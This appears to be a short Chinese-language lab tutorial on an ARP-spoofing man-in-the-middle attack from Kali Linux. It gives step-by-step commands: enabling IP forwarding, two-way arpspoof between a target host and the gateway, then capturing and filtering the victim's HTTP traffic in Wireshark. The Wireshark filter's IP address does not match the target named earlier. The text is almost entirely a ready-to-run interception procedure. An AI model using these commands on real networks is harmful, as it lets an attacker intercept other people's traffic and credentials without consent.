原理:kali冒充网关,欺骗局域网中任何一台靶机,让这台靶机把所有应该发往网管的数据流量发到kali系统,完成捕获分析
实战:
1.路由器转发
echo 1 > /proc/sys/net/ipv4/ip_forward \提示权限不够时输入 echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
2.欺骗设置(双向欺骗)
终端端一:
arpspoof -i eth0 -t 192.168.1.129(目标靶机) 192.168.1.1(网关)
终端二:
arpspoof -i eth0 -t 192.168.1.1(网关) 192.168.1.129(目标靶机)
3.终端三:
sudo wireshark
注:
开启kali的抓包工具wireshark(捕捉靶机发往外网的所有数据包)
4.模拟上网
靶机上网,如访问图片
5.wireshark过滤输入筛选数据
ip.addr==192.168.31.16 and http
6.捕捉数据,分析数据